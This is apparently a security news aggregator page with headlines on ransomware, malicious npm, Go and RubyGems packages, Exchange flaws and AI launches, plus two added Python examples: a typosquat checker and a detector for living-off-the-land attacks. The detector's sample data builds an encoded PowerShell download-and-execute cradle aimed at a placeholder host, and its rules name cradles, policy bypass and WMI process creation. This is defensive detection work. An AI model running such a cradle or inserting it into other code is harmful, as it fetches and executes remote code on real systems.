Seeking to keep sensitive data private and accelerate AI workloads? Look no further than AI PCs powered by Intel Core Ultra processors with a built-in NPU.

Gary Marcus: Taming Silicon Valley | Starmus highlights

The prominent AI researcher explores the societal impact of artificial intelligence and outlines his vision for a future in which AI upholds human rights, dignity, and fairness

This month in security with Tony Anscombe – December 2024 edition

From attacks leveraging new zero-day exploits to a major law enforcement crackdown, December 2024 was packed with impactful cybersecurity news

Chris Hadfield: The sky is falling – what to do about space junk? | Starmus highlights

The first Canadian to walk in space dives deep into the origins of space debris, how it’s become a growing problem, and how we can clean up the orbital mess

ESET Research Podcast: Telekopye, again

Take a peek into the murky world of cybercrime where groups of scammers who go by the nickname of 'Neanderthals’ wield the Telekopye toolkit to ensnare unsuspecting victims they call 'Mammoths'

Unwrapping Christmas scams | Unlocked 403 cybersecurity podcast (special edition)

ESET's Jake Moore reveals why the holiday season is a prime time for scams, how fraudsters prey on victims, and how AI is supercharging online fraud

Cybersecurity is never out-of-office: Protecting your business anytime, anywhere

While you're enjoying the holiday season, cybercriminals could be gearing up for their next big attack – make sure your company's defenses are ready, no matter the time of year

ESET Threat Report H2 2024: Key findings

ESET Chief Security Evangelist Tony Anscombe looks at some of the report's standout findings and their implications for staying secure in 2025

Ransomware: Still Dangerous After All These Years

Ransomware isn’t dying — it’s evolving, swapping encryption for aggressive extortion as attacks and data theft hit record highs.

The post Ransomware: Still Dangerous After All These Years appeared first on Security Boulevard.

Stop Geo-Spoofing with Secure API Integration for Mobile Application

Location Spoofing or Geo Spoofing is the act of deliberately falsifying the geographical location of a device. This can be performed using various techniques such as GPS manipulation, tweaking OS settings, or by using specialized software that tricks apps into reporting incorrect location data. 

The post Stop Geo-Spoofing with Secure API Integration for Mobile Application appeared first on Security Boulevard.

Silent Guardian of Your Codebase: The Role of SAST

In 2025, the average cost of a data breach reached an alarming Rs 22 Crore; a 13% increase from the previous year. This trend highlights how breaches are not only more frequent and sophisticated but also increasingly costly, putting an organization’s reputation and finances at risk. To combat these threats, companies are investing in robust […]

The post Silent Guardian of Your Codebase: The Role of SAST appeared first on Kratikal Blogs.

The post Silent Guardian of Your Codebase: The Role of SAST appeared first on Security Boulevard.

Decoding OTP A Deep Dive into HOTP and TOTP Algorithms

Explore OTP generation algorithms like HOTP and TOTP. Understand their differences, security, and implementation for robust authentication in CIAM and passwordless systems.

The post Decoding OTP A Deep Dive into HOTP and TOTP Algorithms appeared first on Security Boulevard.

CMMC Final Rule: Clear Steps for DoD Contractors

Key Takeaways Understanding the CMMC Final Rule: Why It Matters Now For years, the Cybersecurity Maturity Model Certification (CMMC) has been discussed as a future requirement for defense contractors. But until recently, it served as a framework under development, not enforceable by law. That changed in October 2024, when the Department of Defense (DoD) published […]

The post CMMC Final Rule: Clear Steps for DoD Contractors appeared first on Centraleyes.

The post CMMC Final Rule: Clear Steps for DoD Contractors appeared first on Security Boulevard.

Reveal Security Unveils Preemptive Approach to Securing Applications and Cloud Services

Reveal Security this week unfurled a platform designed to enable cybersecurity teams to preemptively manage access to multiple applications and cloud infrastructure resources both before and after end users have logged in. Company CEO Kevin Hanes said the Reveal Platform takes advantage of machine and deep learning algorithms to identify normal login behavior without having..

The post Reveal Security Unveils Preemptive Approach to Securing Applications and Cloud Services appeared first on Security Boulevard.

How to Build an Incident Response Playbook in 9 Steps

The post How to Build an Incident Response Playbook in 9 Steps appeared first on AI Security Automation.

The post How to Build an Incident Response Playbook in 9 Steps appeared first on Security Boulevard.

Data Center Security

In an era where data is the lifeblood of every enterprise, safeguarding the core of your digital operations—the data center—is absolutely non-negotiable. With cyber threats evolving, regulations tightening, and infrastructure growing more complex, data center security is the pillar of business continuity, trust, and reputation. At Seceon, we understand this better than anyone, which is

The post Data Center Security appeared first on Seceon Inc.

The post Data Center Security appeared first on Security Boulevard.

Inside Kasada: An Intern’s Dive into Bots, Data, and Company Culture

Meet Max and Kasey, two interns at Kasada who tackled real-world challenges from two very different angles—machine learning and sales operations—and came away with sharper skills, meaningful impact, and a clear sense of where they’re headed next.

The post Inside Kasada: An Intern’s Dive into Bots, Data, and Company Culture appeared first on Security Boulevard.

Cloud Network Security

Cloud Network Security refers to the set of policies, technologies, tools, and best practices designed to protect data, applications, and systems that are hosted in the cloud from unauthorized access, cyberattacks, and data breaches. As businesses accelerate their shift to digital-first models, cloud infrastructures have become the backbone of operations. From hybrid clouds to containerized

The post Cloud Network Security appeared first on Seceon Inc.

The post Cloud Network Security appeared first on Security Boulevard.

Royal and BlackSuit ransomware gangs hit over 450 US companies

The U.S. Department of Homeland Security (DHS) says the cybercrime gang behind the Royal and BlackSuit ransomware operations had breached hundreds of U.S. companies before their infrastructure was dismantled last month. [...]

Fake WhatsApp developer libraries hide destructive data-wiping code

Two malicious NPM packages posing as WhatsApp development tools have been discovered deploying destructive data-wiping code that recursively deletes files on a developer's computers. [...]

CISA orders fed agencies to patch new Exchange flaw by Monday

CISA has issued an emergency directive ordering all Federal Civilian Executive Branch (FCEB) agencies to mitigate a critical Microsoft Exchange hybrid vulnerability tracked as CVE-2025-53786 by Monday morning at 9:00 AM ET. [...]

ChatGPT's GPT-5 models released: everything you need to know

After a long wait, GPT-5 is finally rolling out. It's available for free, Plus, Pro and Team users today. This means everyone gets to try GPT-5 today, but paid users get higher limits. [...]

New EDR killer tool used by eight different ransomware groups

A new Endpoint Detection and Response (EDR) killer that is considered to be the evolution of 'EDRKillShifter,' developed by RansomHub, has been observed in attacks by eight different ransomware gangs. [...]

Bouygues Telecom confirms data breach impacting 6.4 million customers

Bouygues Telecom warns it suffered a data breach after the personal information of 6.4 million customers was exposed in a cyberattack. [...]

SonicWall finds no SSLVPN zero-day, links ransomware attacks to 2024 flaw

SonicWall says that recent Akira ransomware attacks exploiting Gen 7 firewalls with SSLVPN enabled are exploiting an older vulnerability rather than a zero-day flaw. [...]

Wave of 150 crypto-draining extensions hits Firefox add-on store

A malicious campaign dubbed 'GreedyBear' has snuck onto the Mozilla add-ons store, targeting Firefox users with 150 malicious extensions and stealing an estimated $1,000,000 from unsuspecting victims. [...]

Cryptomixer founders pled guilty to laundering money for cybercriminals

The founders of the Samourai Wallet (Samourai) cryptocurrency mixer have pleaded guilty to laundering over $200 million for criminals. [...]

Massive IPTV piracy service with 28,000 channels taken offline

The Alliance for Creativity and Entertainment (ACE) announced the shutdown of Rare Breed TV, a major illegal IPTV service provider, after reaching a financial settlement with its operators. [...]

Air France and KLM disclose data breaches impacting customers

Air France and KLM announced on Wednesday that attackers had breached a customer service platform and stolen the data of an undisclosed number of customers. [...]

Microsoft warns of high-severity flaw in hybrid Exchange deployments

Microsoft has warned customers to mitigate a high-severity vulnerability in Exchange Server hybrid deployments that could allow attackers to escalate privileges in Exchange Online cloud environments undetected. [...]

Microsoft accidentally confirms GPT-5, GPT-5-Mini, GPT-5-Nano ahead of launch

OpenAI is hosting a live stream at 10AM PT to announce GPT-5, but Microsoft has already confirmed the details. [...]

Proton releases a new app for two-factor authentication

Proton has a free authenticator app, which is available cross-platform with end-to-end encryption protection for data.

Knox lands $6.5M to compete with Palantir in the federal compliance market

Irina Denisenko, CEO of Knox, launched Knox, a federal managed cloud provider, last year with a mission to help software vendors speed through the FedRAMP security authorization process in just three months, and at a fraction of what it would cost to do it on their own.

Google is adding new device-level features for its Advanced Protection program

At the Android Show, taking place ahead of Google I/O 2025, Google announced that it is adding new device-specific features to its Advanced Protection program, which is designed to protect public figures such as politicians and journalists from different digital threats, with the Android 16 release. The new features include a new way of storing […]

Google announces new security features for Android for protection against scam and theft

At the Android Show on Tuesday, ahead of Google I/O, Google announced new security and privacy features for Android. These new features include new protections for calls, screen sharing, messages, device access, and system-level permissions. With these features, Google aims to protect users from falling for a scam, keep their details secure in case a […]

A 25-year-old police drone founder just raised $75M led by Index

If you ever call 911 from an area that’s hard to get to, you might hear the buzz of a drone well before a police cruiser pulls up. And there’s a good chance that it will be one made by Brinc Drones, a Seattle-based startup founded by 25-year-old Blake Resnick, who dropped out of college […]

A new security fund opens up to help protect the fediverse

A new security fund aims to help apps in the fediverse — like Mastodon, Threads, and Pixelfed — to pay researchers for disclosing security bugs.

How to tell if your online accounts have been hacked

This is a guide on how to check whether someone compromised your online accounts.

Hackers are ramping up attacks using year-old ServiceNow security bugs to target unpatched systems

Threat intelligence startup GreyNoise says it has observed a ‘notable resurgence’ in attack activity

US teachers’ union says hackers stole sensitive personal data on over 500,000 members

PSEA says it "took steps to ensure" its stolen data was deleted, suggesting a ransom demand was paid

CISA scrambles to contact fired employees after court rules layoffs ‘unlawful’

Federal court rules U.S. cybersecurity agency must re-hire over 100 former employees

DOGE axes CISA ‘red team’ staffers amid ongoing federal cuts

Affected staff say more than 100 employees working to protect U.S. government networks were ‘axed’ with no prior warning

What PowerSchool won’t say about its data breach affecting millions of students

New details have emerged about PowerSchool's data breach — but here's what PowerSchool still isn't saying.

Hacker accessed PowerSchool’s network months before massive December breach

CrowdStrike says a hacker had access to PowerSchool's internal system as far back as August.

Japanese telco giant NTT Com says hackers accessed details of almost 18,000 organizations

Unidentified hackers breached NTT Com’s network to steal personal information of employees at thousands of corporate customers

FBI says scammers are targeting US executives with fake BianLian ransom notes

The FBI is warning that scammers are impersonating the BianLian ransomware gang using fake ransom notes sent to U.S. corporate executives. The fake ransom notes, first reported by U.S. cybersecurity company GuidePoint Security, claim that hackers have gained access to an organization’s network to steal sensitive data, and threaten to publish the stolen data unless […]

UK quietly scrubs encryption advice from government websites

The UK is no longer recommending the use of encryption for at-risk groups following its iCloud backdoor demands

Broadcom urges VMware customers to patch ‘emergency’ zero-day bugs under active exploitation

Security experts warn of ‘huge impact’ of actively exploited hypervisor flaws that allow sandbox escape

US said to halt offensive cyber operations against Russia

The reported policy shift comes as the U.S. government signals a change in its threat assessment of Russia

‘Uber for guns’ app Protector lets you hire armed bodyguards like you would an Uber — but does anyone need this?

In a TikTok video with over 3 million views, a woman in a fluffy, maximalist coat sits in the back seat of a luxury SUV, parked in the middle of a New York City street. Atop the 6-second video, a line of text reads, “our bodyguards got us matcha.” The camera zooms in on two […]

Belgium investigating alleged cyberattack on intelligence agency by China-linked hackers

The hackers reportedly exploited a flaw in US cybersecurity firm Barracuda’s software to access VSSE's email server

Recap of Our Presence at VivaTech 2025

Our Core Expertise: Offshore Hosting & Advanced Cybersecurity At KoDDoS, we’ve built our reputation on two complementary pillars: Robust Cybersecurity Capabilities For over a decade, we’ve been protecting digital infrastructure with cutting-edge security technologies: Resilient and Sovereign Offshore Hosting Our global infrastructure is distributed across strategic offshore data centers in: This setup offers …

The post Recap of Our Presence at VivaTech 2025 appeared first on KoDDoS Blog.

KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges.

Paris, June 2025 – From June 11 to 14, Paris will once again become the global epicenter of technological innovation with the return of VivaTechnology 2025, held at Paris Expo Porte de Versailles. Bringing together major tech companies, disruptive startups, global investors, and public institutions, the event stands out as a pivotal moment for the …

The post KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges. appeared first on KoDDoS Blog.

Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe

Video games are more than entertainment; they’re a $200 billion global industry. But as gaming grows, so do cyberattacks. Hackers now see games as goldmines for stealing data, extorting companies, and exploiting players. According to Infosecurity Magazine, Akamai’s 2024 report shows that attacks on gaming platforms are rising alarmingly. In 2024 alone, the industry suffered …

The post Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe appeared first on KoDDoS Blog.

How Social Media Use Can Create Hidden Cybersecurity Risks

Social media is all around us, helping us stay connected, updated, and entertained. But beneath the endless scroll, a darker reality exists. Hidden cybersecurity threats are growing: some obvious, others much harder to spot. The risks are especially alarming for young users. According to the National Institutes of Health, up to 95% of teens aged …

The post How Social Media Use Can Create Hidden Cybersecurity Risks appeared first on KoDDoS Blog.

Read More
KoDDoS at the InCyber Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem

From April 1st to 3rd, 2025, KoDDoS, a provider of specialized services in DDoS protection and secure offshore hosting, marked its presence at the InCyber Europe Forum, held at the Lille Grand Palais. A true crossroads of cyber innovation and cooperation, the event is the largest cybersecurity event in Europe. A benchmark event on an … Continue reading KoDDoS at the InCyber Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem

The post KoDDoS at the InCyber Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem appeared first on KoDDoS Blog.

Read More
Looking back at CloudFest 2025: An essential event for the future of the cloud!

CloudFest is one of the world’s largest cloud computing events. Every year, it brings together the industry’s leading players to discuss the latest technological advancements, emerging trends, and market challenges. In 2025, the event once again cemented its leadership status by providing a dynamic platform for professional exchange and cloud innovation. This edition featured captivating … Continue reading Looking back at CloudFest 2025: An essential event for the future of the cloud!

The post Looking back at CloudFest 2025: An essential event for the future of the cloud! appeared first on KoDDoS Blog.

Read More
KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.

KoDDoS recently strengthened its commitment to the European tech scene by participating in several major events in France. Our team was honored to be invited to key gatherings in the tech industry, highlighting the importance of innovation and cybersecurity in the evolving digital ecosystem. This strategic tour in Paris allowed us to meet top-tier partners, … Continue reading KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.

The post KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris. appeared first on KoDDoS Blog.

Read More
KoDDoS Will be at CyberShow 2025 in Paris!

The post KoDDoS Will be at CyberShow 2025 in Paris! appeared first on KoDDoS Blog.

Read More
Technological innovation in the heart of Los Angeles at the CES 2025 🚀

🚀 Cutting-Edge Services: KoDDoS has established itself as a key player in the field of high-performance hosting. Specializing in anti-DDoS protection, we ensure unmatched service continuity for our clients in the face of growing threats targeting digital infrastructures. We also invest in groundbreaking technologies, including Web3, blockchain, and the Internet of Things (IoT), providing tailored … Continue reading Technological innovation in the heart of Los Angeles at the CES 2025 🚀

The post Technological innovation in the heart of Los Angeles at the CES 2025 🚀 appeared first on KoDDoS Blog.

Read More
Recruitment Announcement: B2B Sales Representatives and Business Introducers

To meet growing demand and accelerate our growth, we are launching a new sales team. We are looking for talented, ambitious, and motivated B2B sales representatives and business introducers who share our vision of a safer and more resilient internet. Job Profile: Position: B2B Sales Representatives and Business Introducers. As a key member of our Sales Team, you will … Continue reading Recruitment Announcement: B2B Sales Representatives and Business Introducers

The post Recruitment Announcement: B2B Sales Representatives and Business Introducers appeared first on KoDDoS Blog.

Read More
Building a Cyber-Aware Workforce: Mexico's Push for Security Training

Last year, Mexico was hit with 324 billion attempted cyberattacks, lending credence to the World Economic Forum's report that the country is the recipient of more than half of all cyber threats in Latin America. This does not bode well for the nation projected to rank 15th in world economies this year. The imperative is clear: Mexico and the businesses it supports need to bolster cybersecurity measures to withstand the disproportionate amount of cyber incidents they may be facing in the next 12 months. A recent report by FTI Consulting urges companies in Latin America to move beyond training...

Read More
Time for an IoT Audit?

IoT is everywhere, quietly powering everything from smart thermostats in homes to complex systems in industrial networks. While these devices bring incredible convenience and innovation, they also open the door to significant cybersecurity risks, especially in manufacturing and similarly sensitive sectors. The longer devices stay online, the more likely they are to become vulnerable due to outdated software, misconfigurations, or a lack of ongoing security management. If you haven’t already taken a hard look at your IoT setup, now is the perfect time to ask: Is it time for an IoT audit? Why...

Read More
Japan's Active Cyberdefense Law: A New Era in Cybersecurity Strategy

On May 16th, 2025, the Japanese Parliament enacted a landmark piece of cybersecurity legislation: the Japan Active Cyberdefense Law. It was a historic moment for the country's digital defense, empowering law enforcement and military agencies to conduct pre-emptive cyber operations before attacks materialize. However, the law doesn't just affect Japan's internal security posture; it reflects a global trend of nations and organizations reshaping their cyber defense strategies to keep pace with increasingly sophisticated, state-sponsored cybercrime. Let's explore it in a little more depth. The...

Read More
A New Era of Global Privacy Complexity

It's no longer enough for CIOs to check boxes and tick off compliance milestones. The world has changed — and with it, the data privacy landscape. From the GDPR in Europe to California's CCPA, and now Brazil's LGPD and India's DPDP, the patchwork of privacy laws continues to expand. What was once a series of siloed regional regulations has become a living, breathing global challenge. For CIOs leading enterprises that span borders, staying compliant isn't just about avoiding penalties. It's about trust. Reputation. Business continuity. And in a world where data is both an asset and a liability...

Read More
The Bullseye on Banks: Why Financial Services Remain a Prime Target for Cyberattacks

The frontlines of cybersecurity have long included the financial services sector, but today’s battlefield is increasingly asymmetric. Threat actors aren’t just going after the big-name banks with sprawling infrastructure and billion-dollar balance sheets. They’re targeting credit unions, wealth management firms, fintech startups, and insurance providers with the same determination and ferocity. What do these entities have that cybercriminals want? Plenty. They are united by their high-value data and direct pathways to financial gain. It’s no surprise then, that a recent report revealed that a...

Read More
SaaS Security in 2025: Why Visibility, Integrity, and Configuration Control Matter More Than Ever

Software-as-a-Service adoption is exploding, but security teams are struggling to keep up. The Cloud Security Alliance’s 2025 SaaS Security Survey has revealed that while investment in and attention to SaaS security are on the rise, genuine control remains elusive, especially when it comes to configuration management, identity governance, and visibility. According to the report, most SaaS security strategies are still fragmented and reactive, leaving organizations vulnerable to risks like misconfigurations, excessive privileges, and a lack of oversight over both human and non-human access. Let...

Read More
Why Agentic Security Doesn’t Mean Letting Go of Control

Autonomous agents are changing the way we think about security. Not in the distant future, right now. These systems (intelligent, self-directed, and capable of making decisions) are starting to play an active role in the SOC. They’re not only collecting data; they’re analyzing it, correlating alerts, prioritizing risks, and even initiating response actions. This is Agentic AI, and it makes people nervous. In security, autonomy often gets mistaken for loss of control. But here’s the thing: agentic doesn’t mean anarchic. The rise of agentic systems doesn’t mean the fall of human oversight. It...

Read More
Out-of-Band Update: Tripwire Enterprise 9.3.1

Tripwire Enterprise 9.3.1 is now available for download in the Tripwire Customer Center. This is an out-of-band update initiated to address two issues discovered in our recent 9.3 release that we felt should be resolved before the next scheduled release cycle. We understand how critical it is for our customers to have accurate system information and reliable asset management capabilities, which is why we prioritized these fixes for immediate release. Our engineering team has been working diligently to resolve these issues and provide this out-of-band release. Resolved Issues The following...

Read More
Does Your Organization Need Deepfake Defenses?

Picture this: you're scrolling through your company's social media feed, and suddenly a video shows your CEO endorsing a competitor's product. It looks real. The voice, the gestures, the background—it's all perfect. Or that same CEO calling you to urgently approve a strange payment. But you know, deep down, it never happened. Welcome to the world of deepfakes, where fabricated videos can throw even the most vigilant organizations into disarray. Deepfakes have evolved from a fringe curiosity into a formidable cybersecurity threat. For businesses that thrive on trust—banks, law firms, healthcare...

Read More
Securing Against Phishing Beyond Email

Phishing is no longer just an email problem. Reports state that 40% of phishing campaigns now span channels beyond email, hitting collaboration tools like Slack and Teams, plus SMS, and social media platforms. Voice phishing (“vishing”) in particular is on the rise: 30% of surveyed organizations reported at least one instance of attackers using spoofed or AI-cloned calls to steal credentials in the past year. QR-code phishing (“quishing”) has also surged, growing 25% year-over-year as threat actors embed malicious codes in posters, invoices, and product packaging to redirect victims to fake...

Read More
Amazon ECS Internal Protocol Exploited to Steal AWS Credentials from Other Tasks

Security researchers have disclosed a critical vulnerability in Amazon Elastic Container Service (ECS) that allows malicious containers to steal AWS credentials from other tasks running on the same EC2 instance. The attack, dubbed “ECScape,” exploits an undocumented internal protocol to impersonate the ECS agent and harvest privileged credentials without requiring container breakout. Vulnerability Overview The […]

The post Amazon ECS Internal Protocol Exploited to Steal AWS Credentials from Other Tasks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
Malicious Go Packages Used by Threat Actors to Deploy Obfuscated Remote Payloads

Socket’s Threat Research Team has identified eleven malicious Go packages distributed via GitHub, with ten remaining active on the Go Module Mirror, posing ongoing risks to developers and CI/CD pipelines. Eight of these packages employ typosquatting techniques, mimicking legitimate modules to exploit namespace confusion in Go’s decentralized ecosystem, where direct imports from repositories can lead […]

The post Malicious Go Packages Used by Threat Actors to Deploy Obfuscated Remote Payloads appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
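As an added illustration of the namespace-confusion problem described above (example code written for this page, not Socket's tooling and not part of the Go project): a small Python check that parses a go.mod, compares every required module path against an organisation's vetted allow-list, and flags any path that sits within a couple of edits of a vetted one. The allow-list, the go.mod text and the two look-alike paths in it are constructed for the demo and are not real packages or real findings.

```python
"""Flag typosquatted module paths in a go.mod file.

Added example: this is not Socket's tooling or part of the Go toolchain. The
vetted allow-list and the go.mod text below are constructed for the demo; a
real check would load the organisation's own list of approved modules.
"""

# Constructed allow-list of module paths the organisation has vetted.
KNOWN_GOOD = {
    "github.com/gorilla/mux",
    "github.com/spf13/cobra",
    "golang.org/x/crypto",
}

# Constructed go.mod: "gorila/mux" and "x/cryptoo" are hypothetical
# look-alike paths invented for this demo, not real packages.
SAMPLE_GO_MOD = """module example.com/app

go 1.22

require (
\tgithub.com/gorilla/mux v1.8.1
\tgithub.com/spf13/cobra v1.8.0 // indirect
\tgithub.com/gorila/mux v1.8.1
)

require golang.org/x/cryptoo v0.1.0
"""


def parse_requires(go_mod: str) -> list[str]:
    """Return module paths from require directives (block and single-line)."""
    paths = []
    in_block = False
    for raw in go_mod.splitlines():
        line = raw.split("//", 1)[0].strip()  # drop trailing comments such as "// indirect"
        if not line:
            continue
        if line.startswith("require ("):
            in_block = True
        elif in_block and line == ")":
            in_block = False
        elif in_block:
            paths.append(line.split()[0])
        elif line.startswith("require "):
            parts = line.split()
            if len(parts) >= 3:
                paths.append(parts[1])
    return paths


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings, keeping one DP row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def suspicious_modules(go_mod: str, known_good: set[str], max_distance: int = 2) -> list[tuple[str, str, int]]:
    """Return (required path, vetted path it resembles, distance) for every
    required path that is not vetted but lies within max_distance edits of
    a vetted one. Exact matches against the allow-list are skipped."""
    findings = []
    for path in parse_requires(go_mod):
        if path in known_good:
            continue
        for good in sorted(known_good):
            d = levenshtein(path, good)
            if d <= max_distance:
                findings.append((path, good, d))
    return findings


if __name__ == "__main__":
    for path, good, d in suspicious_modules(SAMPLE_GO_MOD, KNOWN_GOOD):
        print(f"suspicious: {path} looks like vetted {good} (distance {d})")
```

Run it as a pre-merge check on go.mod. A distance threshold of 2 catches dropped, doubled or swapped letters, but it must be paired with an exact allow-list because a malicious module can also use a completely unrelated path; replace directives that redirect a vetted path to a different repository deserve the same scrutiny.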

Read More
Over 60 Malicious RubyGems Packages Used to Steal Social Media and Marketing Credentials

Socket’s Threat Research Team has exposed a persistent campaign involving over 60 malicious RubyGems packages that masquerade as automation tools for platforms like Instagram, Twitter/X, TikTok, WordPress, Telegram, Kakao, and Naver. Active since at least March 2023, the threat actor operating under aliases such as zon, nowon, kwonsoonje, and soonje has deployed these gems to […]

The post Over 60 Malicious RubyGems Packages Used to Steal Social Media and Marketing Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
Flipper Zero Dark Web Firmware Cracks Rolling Code Security in Modern Cars

Security researchers have discovered alarming new firmware for the popular Flipper Zero device that can completely bypass the rolling code security systems protecting millions of modern vehicles. The breakthrough attack, demonstrated by YouTube channel Talking Sasquatch, represents a significant escalation in automotive cybersecurity threats, requiring only a single intercepted signal to compromise a vehicle’s entire […]

The post Flipper Zero Dark Web Firmware Cracks Rolling Code Security in Modern Cars appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
CISA Issues Urgent Advisory to Address Microsoft Exchange Flaw

The Cybersecurity and Infrastructure Security Agency (CISA) has issued Emergency Directive 25-02 on August 7, 2025, requiring federal agencies to immediately address a critical vulnerability in Microsoft Exchange hybrid configurations that could allow attackers to escalate from on-premises systems to cloud environments. Critical Security Vulnerability Discovered CISA has identified a post-authentication vulnerability designated CVE-2025-53786 affecting […]

The post CISA Issues Urgent Advisory to Address Microsoft Exchange Flaw appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
Retbleed Vulnerability Exploited to Access Any Process’s Memory on Newer CPUs

Security researchers have successfully demonstrated a sophisticated exploit of the Retbleed vulnerability, a critical CPU security flaw that allows attackers to read arbitrary memory from any process running on affected systems. The exploit, which builds upon research originally published by ETH Zürich in 2022, showcases how modern processor vulnerabilities continue to pose significant threats to system […]

The post Retbleed Vulnerability Exploited to Access Any Process’s Memory on Newer CPUs appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
ChatGPT-5 Launches – Discover What’s New in the Next-Gen AI Agent

OpenAI has officially launched ChatGPT-5, marking a significant leap forward in artificial intelligence technology with a revolutionary unified system that combines multiple specialized models to deliver unprecedented performance and versatility. The launch represents the most substantial advancement in conversational AI since the debut of its predecessors, introducing groundbreaking capabilities that promise to transform how users […]

The post ChatGPT-5 Launches – Discover What’s New in the Next-Gen AI Agent appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
10 Best Red Teaming Companies for Advanced Attack Simulation in 2025

Red teaming companies are specialized cybersecurity firms that use a proactive, adversarial approach to test an organization’s defenses by simulating a real-world cyberattack. Unlike traditional penetration testing, which typically focuses on finding specific vulnerabilities, red teaming emulates the tactics, techniques, and procedures (TTPs) of an advanced persistent threat (APT) actor. The goal is to evaluate […]

The post 10 Best Red Teaming Companies for Advanced Attack Simulation in 2025 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

Read More
How Machine Learning Detects Living off the Land (LotL) Attacks

Elite cybercriminals prefer LotL attacks because they’re incredibly hard to spot. Instead of deploying obvious malware, attackers use the same trusted tools that an IT team relies on daily, such as PowerShell, Windows Management Instrumentation (WMI) and various integrated utilities on almost every computer. When attackers use legitimate system tools, traditional security software thinks everything […]

The post How Machine Learning Detects Living off the Land (LotL) Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
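The feature extraction a detector of this kind starts from, as an added example constructed for this page (not code from the article or from any vendor product): it pulls the living-off-the-land indicators the paragraph mentions, PowerShell invocation flags, download cradles, WMI process creation and an Office parent process, out of process-creation events, decodes any -EncodedCommand payload so the rules see the real script rather than base64, and combines the features with weights. The rules, weights and sample events are assumptions for illustration; a production system would learn the weights from labelled telemetry instead of setting them by hand.

```python
"""Turn process-creation events into living-off-the-land features and a score.

Added example: not code from the article or any vendor product. The rules,
weights and sample events are constructed; in practice the feature vector
would be fed to a trained classifier and the weights learned from labelled
telemetry rather than set by hand as they are here.
"""
import base64
import re

# Constructed payload for the demo: a download cradle, base64 of its UTF-16LE
# bytes, which is the form PowerShell's -EncodedCommand expects.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii")

# Constructed sample events: (parent image, command line).
SAMPLE_EVENTS = [
    ("explorer.exe", r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"),
    ("WINWORD.EXE", f"powershell.exe -w hidden -ep bypass -enc {ENCODED}"),
    ("cmd.exe", 'wmic process call create "notepad.exe"'),
    ("services.exe", r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

# Each feature: (regex run over the command line plus any decoded payload, weight).
RULES = {
    "encoded_command": (re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I), 3),
    "download_cradle": (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I), 3),
    "invoke_expression": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    "bypass_policy": (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 1),
    "wmi_process_create": (re.compile(r"wmic(?:\.exe)?\s+.*process\s+call\s+create|Win32_Process", re.I), 3),
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
OFFICE_PARENT_WEIGHT = 4
SCRIPT_HOSTS = re.compile(r"powershell|pwsh|cmd\.exe|wscript|cscript|mshta", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent/invalid."""
    m = re.search(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def extract_features(parent: str, cmdline: str) -> dict[str, bool]:
    """Boolean feature vector; rules run over the raw and the decoded command."""
    text = cmdline + " " + decode_encoded_command(cmdline)
    feats = {name: bool(rx.search(text)) for name, (rx, _) in RULES.items()}
    feats["office_parent"] = parent.lower() in OFFICE_PARENTS and SCRIPT_HOSTS.search(cmdline) is not None
    return feats


def score(feats: dict[str, bool]) -> int:
    """Weighted sum of the features that fired."""
    total = sum(w for name, (_, w) in RULES.items() if feats[name])
    if feats["office_parent"]:
        total += OFFICE_PARENT_WEIGHT
    return total


def triage(events, threshold: int = 5):
    """Return (parent, cmdline, score) for events at or above the threshold."""
    hits = []
    for parent, cmdline in events:
        s = score(extract_features(parent, cmdline))
        if s >= threshold:
            hits.append((parent, cmdline, s))
    return hits


if __name__ == "__main__":
    for parent, cmdline, s in triage(SAMPLE_EVENTS):
        print(f"[{s}] {parent} -> {cmdline[:60]}...")
```

The decoding step matters more than any single regex: the same cradle scores nothing if the rules only see the base64 blob, which is exactly why attackers encode it. The services.exe event with -ExecutionPolicy Bypass stays below the threshold on purpose; that flag alone is common in legitimate scheduled tasks, and it is the combination with a hidden window, an encoded payload and an Office parent that separates abuse from administration.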

Read More
HashiCorp Vault 0-Day Flaws Enable Remote Code Execution Attacks

